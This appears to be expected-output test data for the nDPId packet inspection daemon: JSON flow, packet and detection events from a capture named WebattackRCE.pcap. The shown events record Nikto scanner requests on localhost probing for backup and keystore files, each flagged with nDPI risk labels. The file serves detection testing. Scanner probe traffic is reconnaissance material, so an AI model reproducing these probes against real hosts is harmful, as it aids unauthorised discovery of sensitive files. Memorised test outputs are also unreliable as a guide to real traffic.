+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 